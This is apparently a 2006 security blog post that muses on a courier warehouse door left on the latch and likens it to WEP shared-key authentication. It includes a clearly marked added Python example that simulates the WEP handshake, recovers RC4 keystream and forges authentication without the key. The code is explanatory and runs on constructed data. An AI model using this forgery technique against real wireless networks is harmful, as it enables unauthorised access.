Wednesday, October 25, 2006

Self Defeating Security

Part of my role involves inspecting third-party vendors' sites to ensure that they comply with my client's security policies. This is normally when a vendor will be storing or processing my client's data.

One of the unfortunate side effects of this is that I find myself evaluating security when not at work as well.

For example, yesterday I was at the Citilink parcel couriers' warehouse at Gatwick collecting a delivery. They had cipher locks on the doors leading into the restricted areas of the building. There was no obvious CCTV focused on these doors, so the locks seemed to be more for casual security.
Also, there were no privacy shields on the locks, so shoulder surfing was definitely an option. On the positive side, the numbers were not printed on the buttons themselves, so wear on frequently used combinations would be harder to detect.

OK so far. Then I noticed that the door had been left on the latch, so anyone could walk in [see picture].

Here is where it gets interesting. Is this bad security or good security?

The answer depends on which threat they are trying to mitigate. Since a shoulder-surfing attack was on the cards, maybe Citilink had realized this and so has a policy of latching the door during the day to prevent disclosure of the entry code.
Slightly unusual, but there is a compensating control: many staff are around during the day to spot intruders.
Then during night hours they engage the door lock, with reasonable assurance that the entry code hasn't been compromised. They may not even tell the day staff the code, which provides additional protection.

This would be similar to not using shared-key authentication with WEP. The AP sends a challenge in the clear and the station returns it encrypted with the data-encrypting WEP key, so an eavesdropper gets a known plaintext/ciphertext pair (and hence the RC4 keystream for that IV). Enabling the "stronger" authentication mode actually reduces overall security. http://www.securityfocus.com/infocus/1814
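To make the WEP comparison concrete, here is an added example (mine, not code from the original post or from the SecurityFocus article) that simulates the four-frame shared-key handshake with a toy WEP implementation (RC4 plus a CRC-32 ICV). The key, IV and challenge bytes are constructed, and all function names are my own. A passive eavesdropper who sees the clear challenge and the encrypted response XORs them to recover 132 bytes of keystream for that IV, and can then answer any later challenge without ever knowing the key.

```python
"""Why WEP shared-key authentication leaks keystream (constructed example)."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling (KSA) then keystream generation (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(data: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the plaintext."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear || RC4(IV || key, plaintext || ICV)."""
    return iv + rc4(iv + wep_key, plaintext + icv(plaintext))


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Return the plaintext if the ICV checks out, else None."""
    iv, body = frame[:3], frame[3:]
    plain = rc4(iv + wep_key, body)
    data, tag = plain[:-4], plain[-4:]
    return data if icv(data) == tag else None


# --- the shared-key handshake (frames 2 to 4) ---------------------------

def station_respond(wep_key: bytes, iv: bytes, challenge: bytes) -> bytes:
    """Frame 3: the AP's 128-byte challenge, WEP-encrypted under the data key."""
    return wep_encrypt(wep_key, iv, challenge)


def ap_verify(wep_key: bytes, challenge: bytes, response: bytes) -> bool:
    """Frame 4: the AP decrypts and accepts if it gets its own challenge back."""
    return wep_decrypt(wep_key, response) == challenge


# --- what a passive eavesdropper gets -----------------------------------

def recover_keystream(challenge: bytes, response: bytes):
    """Frame 2 went out in the clear, so plaintext XOR ciphertext is the RC4
    keystream for this IV: 132 bytes of it (128 challenge + 4 ICV)."""
    iv, body = response[:3], response[3:]
    known_plain = challenge + icv(challenge)
    keystream = bytes(p ^ c for p, c in zip(known_plain, body))
    return iv, keystream


def forge_response(iv: bytes, keystream: bytes, new_challenge: bytes) -> bytes:
    """Answer a fresh challenge without the key: reuse the same IV and XOR the
    new challenge (plus its ICV) with the recovered keystream. WEP does nothing
    to stop IV reuse, so the AP accepts the forged frame."""
    known_plain = new_challenge + icv(new_challenge)
    assert len(known_plain) <= len(keystream), "not enough keystream"
    return iv + bytes(p ^ k for p, k in zip(known_plain, keystream))


def demo() -> bool:
    """Run the whole attack on constructed data; True if the forgery is accepted."""
    wep_key = b"\x01\x02\x03\x04\x05"   # constructed 40-bit key
    iv = b"\xaa\xbb\xcc"                # constructed IV
    challenge = bytes(range(128))       # constructed stand-in for a random challenge
    response = station_respond(wep_key, iv, challenge)
    assert ap_verify(wep_key, challenge, response)          # legitimate station
    iv_seen, ks = recover_keystream(challenge, response)    # eavesdropper
    new_challenge = bytes(255 - i for i in range(128))      # AP's next challenge
    forged = forge_response(iv_seen, ks, new_challenge)
    return ap_verify(wep_key, new_challenge, forged)        # attacker, no key


if __name__ == "__main__":
    print("forged auth accepted:", demo())
```

The same 132 bytes of keystream also decrypt the start of any data frame later sent under that IV, which is why "open" authentication plus WEP leaks less than shared-key authentication plus WEP: the control that looks stronger hands the attacker a known-plaintext pair for free.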

...Or maybe someone at Citilink just forgot and left the door on the latch ;)
